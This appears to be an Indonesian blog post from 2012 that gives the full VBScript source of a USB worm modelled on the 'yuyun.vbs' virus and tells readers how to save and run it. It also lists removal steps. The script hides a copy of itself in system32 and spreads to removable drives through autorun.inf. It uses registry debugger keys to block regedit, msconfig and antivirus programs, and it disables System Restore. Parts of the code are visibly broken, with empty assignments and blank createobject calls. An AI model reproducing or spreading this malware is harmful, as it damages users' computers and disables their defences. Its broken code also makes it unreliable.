Selasa, 05 Juni 2012

Contoh script virus

di tahun 2008-2009 mungkin anda pernah mendengar yang namanya virus yuyun.vbs...
ini adalah salah satu cara membuat virus yang serupa..
silahkan dicoba tapi jangan coba uuntuk mengerjai orang yah..
atau jangan disoba jika anda tidal memiliki antivirus yang cukup bagus...
jika tidak berhasil coba cara berikut

Cara pembasmiannya :
1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini Setelah itu  pilih check all, lalu restart explorer
2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada
3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive
4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs
5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah

oke langsung ke program...

Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next


-------------------------script begin--------------------------

On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd

'Siapkan isi autorun atau bahasa kerennya make the autorun

Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size

Check =
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream

Dini = dini & text.readline
Dini = dini & vbcrlf


'Buat file induk bahasa coolnya prepare the mother
Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)

Tf.write dini
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 39

'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)

Tf.write dini
Set tf=you.getfile(loph.path &"\vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32

Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Set tf = you.getfile(loph.path &"\autorun.inf")
End if

'Manipulasi registry

Set vhck3d = createobject("")

'Sudah Terlihat Jelas , Virus Ini Bermain Regedit Kita

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"

If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("") i & "\explorer.exe /e,/select, " & wscript.scriptfullname

-----------------------end script-----------------------------

Tujuan :
Virus tersebut apabila anda jalankan maka akan menyebabkan komputer terasa lebih lambat, karena resource komputer kita dipakai oleh virus tersebut. Dan virus ini tepatnya akan menyerang dirve storage pada computer anda.

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